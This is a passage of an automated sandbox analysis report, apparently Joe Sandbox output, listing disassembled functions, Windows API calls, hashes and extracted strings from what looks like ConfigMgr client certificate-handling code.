                                                                                          • Opcode ID: ccbfe2f28b4817e873ef94974c7117c40cd7e3b45d15a9ea70192554c80338af
                                                                                          • Instruction ID: 120c70ed7e9d5bb22cde347b8341904b078828bf59a827c722a57548467e26f6
                                                                                          • Opcode Fuzzy Hash: ccbfe2f28b4817e873ef94974c7117c40cd7e3b45d15a9ea70192554c80338af
                                                                                          • Instruction Fuzzy Hash: 11E08670D0520A9ACB15FFA8550679D7E71BF84310F10865FB459A73C1CE700B149751
                                                                                          Function 005775C6 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: a23258bd2c3a0ff8db0d5b3b45f2e2984a239e5f15dfcc25933fdcfbccd9e676
                                                                                          • Instruction ID: 2c33e686ca615bd3508b3365caf35af80af227386a71faa78578e77f46ce22d9
                                                                                          • Opcode Fuzzy Hash: a23258bd2c3a0ff8db0d5b3b45f2e2984a239e5f15dfcc25933fdcfbccd9e676
                                                                                          • Instruction Fuzzy Hash: 56E0BF74501206DBCB18EFB8D90555D7F71BF46320B6487AEA0359F2E1C7719A02DB50
                                                                                          Function 005F4253 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005F425A
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                            • Part of subcall function 005F4CCF: __EH_prolog3_catch.LIBCMT ref: 005F4CD6
                                                                                            • Part of subcall function 005F4CCF: GetCurrentThreadId.KERNEL32 ref: 005F4D29
                                                                                            • Part of subcall function 005F4CCF: __CxxThrowException@8.LIBCMT ref: 005F4D9C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CurrentException@8H_prolog3_catchThreadThrow
                                                                                          • String ID:
                                                                                          • API String ID: 2746221494-0
                                                                                          • Opcode ID: 50a19a60cfbee5fb72b0a4da8c884eaf1505b99906f3011bc0a8b102c0799e31
                                                                                          • Instruction ID: d204e51ca641f65d10a1f9b8285d30b0b2f2cbcf5139af3a12308843e6b1ed26
                                                                                          • Opcode Fuzzy Hash: 50a19a60cfbee5fb72b0a4da8c884eaf1505b99906f3011bc0a8b102c0799e31
                                                                                          • Instruction Fuzzy Hash: 4AE046B490020AEBDF01EF50C809BAD7B72BFA4312F008409FA041E381CBB99A51DF40
                                                                                          Function 00592624 Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F2175: __EH_prolog3_catch_GS.LIBCMT ref: 005F217F
                                                                                            • Part of subcall function 005F2175: TlsGetValue.KERNEL32 ref: 005F21EC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_ThreadValue
                                                                                          • String ID:
                                                                                          • API String ID: 528860816-0
                                                                                          • Opcode ID: 39b1d3b361005d4e4eb15676faa233f8cf2f334262bcaa0f5563f28b55d13586
                                                                                          • Instruction ID: f061a1e2ad0becad2a63216539d302835ac98c3787f4fed8eacb65523a54a98c
                                                                                          • Opcode Fuzzy Hash: 39b1d3b361005d4e4eb15676faa233f8cf2f334262bcaa0f5563f28b55d13586
                                                                                          • Instruction Fuzzy Hash: 99D09276000108BF8B02AF94EC08CAA7FAEFB88310B058051FA1C8A131CA32E965DB50
                                                                                          Function 00571178 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 0057117F
                                                                                            • Part of subcall function 00615355: __EH_prolog3.LIBCMT ref: 0061535C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3
                                                                                          • String ID:
                                                                                          • API String ID: 431132790-0
                                                                                          • Opcode ID: 950561c004b513b0ad419cd7084d4d558a54c5a325d4ee4fc0eb35d3a2fa3b0e
                                                                                          • Instruction ID: 3b5b0a04c65a2e9342e9ed5eec925133a9502670a5e4b7bcfa57025863f0be60
                                                                                          • Opcode Fuzzy Hash: 950561c004b513b0ad419cd7084d4d558a54c5a325d4ee4fc0eb35d3a2fa3b0e
                                                                                          • Instruction Fuzzy Hash: B5C0122469070255D7267278081B78D2F066FC4770F50525BF2A16E3C68DE595410A15
                                                                                          Function 00593159 Relevance: 1.3, APIs: 1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005781C3: LocalFree.KERNEL32 ref: 005781D2
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLocal
                                                                                          • String ID:
                                                                                          • API String ID: 2826327444-0
                                                                                          • Opcode ID: efe955568bdeb3793b2dbf4e820118a0a9c30014b9a8e436e6159072b5b843c8
                                                                                          • Instruction ID: 7b36521816a2646e219bb15c3cdb4a6f508da761afc42219933e56183e619835
                                                                                          • Opcode Fuzzy Hash: efe955568bdeb3793b2dbf4e820118a0a9c30014b9a8e436e6159072b5b843c8
                                                                                          • Instruction Fuzzy Hash: 89319C30A48398E9EB25DB64CD5EBDCBB70AB51704F6044DAE2093B1C2DBB41F88CB51
                                                                                          Function 005931A8 Relevance: 1.3, APIs: 1, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLocal
                                                                                          • String ID:
                                                                                          • API String ID: 2826327444-0
                                                                                          • Opcode ID: 83eb89d37b0b5cd8b9d5e55d46ab7cdc993390ea783aad66c0748862dada1269
                                                                                          • Instruction ID: 9ea9bf35d02330dae21ffe81958af0c8f66ab23f47e0ef6adabb8192ab7d344a
                                                                                          • Opcode Fuzzy Hash: 83eb89d37b0b5cd8b9d5e55d46ab7cdc993390ea783aad66c0748862dada1269
                                                                                          • Instruction Fuzzy Hash: 27218D30A48388E9EB25DB64CD5BBDCBB70AB51704F6044DAE2057B1C2D7B51B48DB51

                                                                                          Non-executed Functions

                                                                                          Function 0062706A Relevance: 298.8, APIs: 49, Strings: 121, Instructions: 1328threadencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00627074
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006271F3
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062725D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006272A8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062736A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00627419
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00628423
                                                                                          • CertFreeCertificateContext.CRYPT32(?), ref: 00628434
                                                                                          • CertFreeCertificateContext.CRYPT32(?), ref: 00628445
                                                                                          Strings
                                                                                          • ..\CcmCert.cpp, xrefs: 006280D2
                                                                                          • ..\CcmCert.cpp, xrefs: 00627B6B
                                                                                          • ..\CcmCert.cpp, xrefs: 00627632
                                                                                          • There are at least 2 certificates valid for ConfigMgr usage that meet the selection criteria. The '%s' registry entry was set to O, xrefs: 006281AF
                                                                                          • ..\CcmCert.cpp, xrefs: 00627E91
                                                                                          • ..\CcmCert.cpp, xrefs: 00627269
                                                                                          • `, xrefs: 006282F4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627804
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00628066
                                                                                          • ..\CcmCert.cpp, xrefs: 00627DDA
                                                                                          • ..\CcmCert.cpp, xrefs: 006277F9
                                                                                          • ..\CcmCert.cpp, xrefs: 00627425
                                                                                          • ..\CcmCert.cpp, xrefs: 00627BEF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006272A3
                                                                                          • GetCertificateInStoreByCertNameEx( hChainEngine, hStore, sData, bCertFirstFlag, dwValidationFlags, ppCertContext), xrefs: 006277FF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627F98
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627258
                                                                                          • CcmUtilLib::GetCertificate, xrefs: 006271A2
                                                                                          • 0 != hStore, xrefs: 0062729E
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sCN, 3, 0, (LPBYTE)bbData.getBuffer(), &cbData, 0 ), xrefs: 00628061
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627E9C
                                                                                          • saParts.size() > 0, xrefs: 00627360
                                                                                          • ..\CcmCert.cpp, xrefs: 00627AF1
                                                                                          • ::CryptDecodeObject( 0x00000001 | 0x00010000, ((LPCSTR) 20), (LPBYTE)bbData.getBuffer(), cbData, 0, 0, &dwLen ), xrefs: 006279FC
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sFindPara, dwStrType, 0, 0, &cbData, 0 ), xrefs: 006278B2
                                                                                          • ..\CcmCert.cpp, xrefs: 00627CF3
                                                                                          • ..\CcmCert.cpp, xrefs: 0062724D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627FEE
                                                                                          • ..\CcmCert.cpp, xrefs: 00627997
                                                                                          • There are no certificate(s) that meet the criteria., xrefs: 006282FE
                                                                                          • ..\CcmCert.cpp, xrefs: 00627376
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062825A
                                                                                          • 0 != ppCertContext, xrefs: 00627253
                                                                                          • (stEnhKeyUsage.rgpszUsageIdentifier[dwIdx]) != 0, xrefs: 006274C5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006271EE
                                                                                          • ..\CcmCert.cpp, xrefs: 00627FA5
                                                                                          • ..\CcmCert.cpp, xrefs: 00627A4A
                                                                                          • ..\CcmCert.cpp, xrefs: 006279F6
                                                                                          • ..\CcmCert.cpp, xrefs: 00627409
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627CFE
                                                                                          • (stEnhKeyUsage.rgpszUsageIdentifier) != 0, xrefs: 0062740F
                                                                                          • ..\CcmCert.cpp, xrefs: 006271E3
                                                                                          • ..\CcmCert.cpp, xrefs: 006274BF
                                                                                          • String::npos != nPOS, xrefs: 00627638
                                                                                          • 2.5.29.17, xrefs: 00627727
                                                                                          • Invalid criteria format: %s, xrefs: 00627EE2
                                                                                          • Select First Certificate, xrefs: 006281AA
                                                                                          • t)l, xrefs: 006278D4
                                                                                          • ., xrefs: 00627828
                                                                                          • Skipping this certificate that is not valid for ConfigMgr usage., xrefs: 006282AC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062763D
                                                                                          • (pName) != 0, xrefs: 00627A50
                                                                                          • Invalid criteria format: %s, xrefs: 00627683
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627DC9
                                                                                          • ..\CcmCert.cpp, xrefs: 00627D0F
                                                                                          • ..\CcmCert.cpp, xrefs: 00627B09
                                                                                          • Performing SubjectAttr to SAN2 search., xrefs: 0062779F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062790D
                                                                                          • ..\CcmCert.cpp, xrefs: 00627DBE
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627AFC
                                                                                          • 0 != pTempCertContext, xrefs: 00628255
                                                                                          • ..\CcmCert.cpp, xrefs: 0062791E
                                                                                          • ..\CcmCert.cpp, xrefs: 00627811
                                                                                          • ..\CcmCert.cpp, xrefs: 00627B87
                                                                                          • ..\CcmCert.cpp, xrefs: 0062735A
                                                                                          • ..\CcmCert.cpp, xrefs: 00627F8D
                                                                                          • cn=%s, xrefs: 00627F0D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627414
                                                                                          • bbData.resize( cbData ), xrefs: 00627FE9
                                                                                          • ..\CcmCert.cpp, xrefs: 0062797F
                                                                                          • (pAttr->pszObjId) != 0, xrefs: 00627CF9
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sCN, 3, 0, 0, &cbData, 0 ), xrefs: 00627F93
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062758B
                                                                                          • Invalid criteria format: %s, xrefs: 006273AB
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627B76
                                                                                          • ::CryptDecodeObject( 0x00000001 | 0x00010000, ((LPCSTR) 20), (LPBYTE)bbData.getBuffer(), cbData, 0, pName, &dwLen ), xrefs: 00627AF7
                                                                                          • ..\CcmCert.cpp, xrefs: 00627298
                                                                                          • ..\CcmCert.cpp, xrefs: 00627FFF
                                                                                          • ..\CcmCert.cpp, xrefs: 0062764E
                                                                                          • ..\CcmCert.cpp, xrefs: 00627A0E
                                                                                          • ..\CcmCert.cpp, xrefs: 00627FE3
                                                                                          • cRDNs > 0, xrefs: 00627B71
                                                                                          • =, xrefs: 006275F2
                                                                                          • B, xrefs: 006281A0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627BFA
                                                                                          • ..\CcmCert.cpp, xrefs: 006280EA
                                                                                          • (pAttr->Value.pbData) != 0, xrefs: 00627DC4
                                                                                          • x, xrefs: 00627678
                                                                                          • ..\CcmCert.cpp, xrefs: 00628073
                                                                                          • X, xrefs: 006282A2
                                                                                          • p, xrefs: 006275C6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627365
                                                                                          • ..\CcmCert.cpp, xrefs: 006278AC
                                                                                          • ..\CcmCert.cpp, xrefs: 006278C4
                                                                                          • ..\CcmCert.cpp, xrefs: 00627A66
                                                                                          • ..\CcmCert.cpp, xrefs: 0062824F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627A01
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006278B7
                                                                                          • (paIdAttr) != 0, xrefs: 00627BF5
                                                                                          • ..\CcmCert.cpp, xrefs: 0062759C
                                                                                          • ..\CcmCert.cpp, xrefs: 006272B4
                                                                                          • ..\CcmCert.cpp, xrefs: 006274DB
                                                                                          • ..\CcmCert.cpp, xrefs: 00627EAD
                                                                                          • sFindPara.length() > 0, xrefs: 006271E9
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00627A55
                                                                                          • (sOID.length() > 0) && (sData.length() > 0), xrefs: 00627E97
                                                                                          • Invalid criteria format: %s, xrefs: 006275D1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006280DD
                                                                                          • bbData.resize( cbData ), xrefs: 00627908
                                                                                          • ..\CcmCert.cpp, xrefs: 00627580
                                                                                          • ..\CcmCert.cpp, xrefs: 00628267
                                                                                          • ..\CcmCert.cpp, xrefs: 00627902
                                                                                          • saParts.size() > 0, xrefs: 00627586
                                                                                          • cn=, xrefs: 00627EF3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0062798A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006274CA
                                                                                          • ::CertStrToNameW( 0x00000001, (LPCWSTR)sFindPara, dwStrType, 0, (LPBYTE)bbData.getBuffer(), &cbData, 0 ), xrefs: 00627985
                                                                                          • ..\CcmCert.cpp, xrefs: 0062805B
                                                                                          • ..\CcmCert.cpp, xrefs: 00627C0B
                                                                                          • HexBinaryDecode( sFindPara, &pbData, &cbData), xrefs: 006280D8
                                                                                          • ..\CcmCert.cpp, xrefs: 006271FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Free$CertCertificateContext$H_prolog3H_prolog3_catch_Task
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pAttr->Value.pbData) != 0$(pAttr->pszObjId) != 0$(pName) != 0$(paIdAttr) != 0$(sOID.length() > 0) && (sData.length() > 0)$(stEnhKeyUsage.rgpszUsageIdentifier) != 0$(stEnhKeyUsage.rgpszUsageIdentifier[dwIdx]) != 0$.$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$0 != hStore$0 != pTempCertContext$0 != ppCertContext$2.5.29.17$::CertStrToNameW( 0x00000001, (LPCWSTR)sCN, 3, 0, (LPBYTE)bbData.getBuffer(), &cbData, 0 )$::CertStrToNameW( 0x00000001, (LPCWSTR)sCN, 3, 0, 0, &cbData, 0 )$::CertStrToNameW( 0x00000001, (LPCWSTR)sFindPara, dwStrType, 0, (LPBYTE)bbData.getBuffer(), &cbData, 0 )$::CertStrToNameW( 0x00000001, (LPCWSTR)sFindPara, dwStrType, 0, 0, &cbData, 0 )$::CryptDecodeObject( 0x00000001 | 0x00010000, ((LPCSTR) 20), (LPBYTE)bbData.getBuffer(), cbData, 0, 0, &dwLen )$::CryptDecodeObject( 0x00000001 | 0x00010000, ((LPCSTR) 20), (LPBYTE)bbData.getBuffer(), cbData, 0, pName, &dwLen )$=$B$CcmUtilLib::GetCertificate$GetCertificateInStoreByCertNameEx( hChainEngine, hStore, sData, bCertFirstFlag, dwValidationFlags, ppCertContext)$HexBinaryDecode( sFindPara, &pbData, &cbData)$Invalid criteria format: %s$Invalid criteria format: %s$Invalid criteria format: %s$Invalid criteria format: %s$Performing SubjectAttr to SAN2 search.$Select First Certificate$Skipping this certificate that is not valid for ConfigMgr usage.$String::npos != nPOS$There are at least 2 certificates valid for ConfigMgr usage that meet the selection criteria. The '%s' registry entry was set to O$There are no certificate(s) that meet the criteria.$X$`$bbData.resize( cbData )$bbData.resize( cbData )$cRDNs > 0$cn=$cn=%s$p$sFindPara.length() > 0$saParts.size() > 0$saParts.size() > 0$t)l$x
                                                                                          • API String ID: 1441946896-3622335582
                                                                                          • Opcode ID: 156f47d0204eada7fac23c761f424919d67c4018c9c992a2357566e2e6de75a9
                                                                                          • Instruction ID: f28e1a1cb28dbf91e2c56538d5064e443afca51b826e2689d6f874e21514b0e1
                                                                                          • Opcode Fuzzy Hash: 156f47d0204eada7fac23c761f424919d67c4018c9c992a2357566e2e6de75a9
                                                                                          • Instruction Fuzzy Hash: 38B2ACB0941229EEEB20DF64DC49FEEBBB9BB44704F0041D9E509A7281DB759E81CF60
                                                                                          Function 006763D8 Relevance: 59.8, APIs: 8, Strings: 26, Instructions: 345threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006763E2
                                                                                          • GetAdaptersInfo.IPHLPAPI(?,?), ref: 00676466
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006764B9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00676534
                                                                                          • GetAdaptersInfo.IPHLPAPI(00000000,?), ref: 0067654B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006766D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00676587
                                                                                            • Part of subcall function 00676FC8: __EH_prolog3_catch_GS.LIBCMT ref: 00676FCF
